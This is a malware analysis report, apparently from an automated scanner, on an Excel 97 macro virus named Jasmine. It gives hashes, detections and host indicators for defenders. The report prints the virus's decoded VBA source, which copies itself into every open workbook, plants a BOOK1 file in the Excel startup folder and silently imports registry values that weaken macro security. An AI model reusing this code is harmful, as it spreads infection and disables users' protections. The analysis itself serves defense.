Xls.Trojan.Jasmine-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 5f57f13a8f063e63…

MALICIOUS

Office (OLE)

54.0 KB Created: 2000-02-27 18:40:25 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 446ed91364cb7c7784a7ff948ed46e03 SHA-1: 8362b56a84b244a594617bbb52963a3147cb4b1f SHA-256: 5f57f13a8f063e63ac0c7a8d7aebb1d1141ab578af1418be6cff7e14f3fc89c4
200 Risk Score

Malware Insights

Xls.Trojan.Jasmine-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

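The file is an Excel spreadsheet containing VBA macros. A critical heuristic detected the use of the Shell() function within the VBA code, indicating an attempt to execute external commands; in the script preview below, that call runs `regedit /s` on a .reg file which the macro writes to c:\remove.reg and then deletes. The ClamAV detection explicitly names this file as 'Xls.Trojan.Jasmine-3', suggesting it is a known malicious variant. In the preview, the macro runs from the WorkBook_Activate event and passes its own code module to an Encode routine (not shown in the preview). It then copies that code into the ThisWorkbook and Sheet modules of every open workbook and saves a new workbook as BOOK1 in Excel's startup folder. The .reg file it imports sets Excel security values under HKEY_CURRENT_USER\Software\Microsoft\Office (`Level` for Office 9.0, `Options6` for Office 8.0), which control macro protection. On a suspected host, the artifacts to check are changed values under those keys, a BOOK1 file in the Excel startup path, and the "'Jasmine" marker comment in workbook code modules.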

Heuristics 3

  • ClamAV: Xls.Trojan.Jasmine-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jasmine-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA code calls Shell(), which starts an external program from within the macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 88796 bytes
SHA-256: 04c46afce842ab3fc1116276a65997cd81b0af4a3552f3956fd5a1c234d7f9b1
Detection
ClamAV: Xls.Trojan.Jasmine-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Excel97.Jasmine v1.2
'Copyright (c) 1999, cry0tek

Public Yp3Wi1Ex3Iq8Iw1, Xc4Rc6Nb1Xh7Uc3Yy9 As Boolean
'Jasmine
Private Sub WorkBook_Activate()
On Error Resume Next
Dim Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 As Object
Eq7Jw1 = "c:\remove.reg": Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 = "[HKEY_CURRENT_USER\Software\Microsoft\Office\"
For i = 1 To Workbooks.Count
 Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule
 Randomize
 If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) = "'Jasmine" Then
  Call Encode(Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4)
  Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5 = Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(1, _
   Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.CountOfLines)
  GoTo Dj4Rb0Vn7Kv8Uz2Yx3Ym1
 End If
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  Set Se3Hs8Xo2Ir2Rq4Kc9 = Workbooks(i).VBProject.VBComponents.Item(j)
  Wb9 = Se3Hs8Xo2Ir2Rq4Kc9.Name
  Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Se3Hs8Xo2Ir2Rq4Kc9.CodeModule
  If InStr(1, Wb9, "Sheet") Then
   If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) = "'Jasmine" Then _
    Call Encode(Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4)
    Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5 = Workbooks(i).VBProject.VBComponents _
    .Item(j).CodeModule.Lines(1, Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.CountOfLines)
    GoTo Dj4Rb0Vn7Kv8Uz2Yx3Ym1
  End If
 Next
Next
Dj4Rb0Vn7Kv8Uz2Yx3Ym1:
If UCase(Dir(Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
 If Yp3Wi1Ex3Iq8Iw1 <> True Then
  Yp3Wi1Ex3Iq8Iw1 = True: Xc4Rc6Nb1Xh7Uc3Yy9 = True
  Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\BOOK1.", FileFormat:=xlNormal, AddToMru:=False
 End If
End If
For i = 1 To Workbooks.Count
 Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule
 If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) <> "'Jasmine" Then
  Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.InsertLines 1, Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5
  Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.ReplaceLine 6, "Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)"
 End If
  For ii = 1 To Workbooks(i).VBProject.VBComponents.Count
   Set Se3Hs8Xo2Ir2Rq4Kc9 = Workbooks(i).VBProject.VBComponents.Item(ii)
   Wb9 = Se3Hs8Xo2Ir2Rq4Kc9.Name
   Set Infline = Se3Hs8Xo2Ir2Rq4Kc9.CodeModule
   If Infline.Lines(5, 1) <> "'Jasmine" Then
    If InStr(1, Wb9, "Sheet") Then
     Se3Hs8Xo2Ir2Rq4Kc9.CodeModule.InsertLines 1, Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5
     Se3Hs8Xo2Ir2Rq4Kc9.CodeModule.ReplaceLine 6, "Private Sub WorkBook_Activate()"
    End If
   End If
  Next
Next
If Xc4Rc6Nb1Xh7Uc3Yy9 = True Then
 Xc4Rc6Nb1Xh7Uc3Yy9 = False
 Workbooks("Book1.").Close savechanges:=True
 Open Eq7Jw1 For Output As 1
 Print #1, "REGEDIT4"
 If Left(Application.Version, 1) = 9 Then
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "9.0\Excel\Security]"
  Print #1, """Level""=dword:00000001"
 Else
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\New User\Settings\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
 End If
 Close 1
 Shell "regedit /s " & Eq7Jw1, vbHide
 Kill Eq7Jw1
End If
If Minute(Now) = Second(Now) Then
 Select Case Day(Now)
  Case 1 To 5 And Int((5 * Rnd) + 1) = 1
   Application.StatusBar = "Excel97.Jasmine v1.2"
  Case 6 To 10 And Int((5 * Rnd) + 1) = 1
   With Assistant.NewBalloon
    .Heading = "Excel97.Jasmine v1.2"
    .Text = "Since the only time I see her near" & vbCr & "Is when I close my eyes" & vbCr & _
            "Should I keep it that way" & vbCr & "The only way I can make her stay..." & vbCr & vbCr
    .Animation = 22
    .Show
   End With
  Case 11 To 20 And Int((5 * Rnd) + 1) = 1
   For i = 1 To 600 Step Int((Rnd * 2) + 1)
  
... (truncated)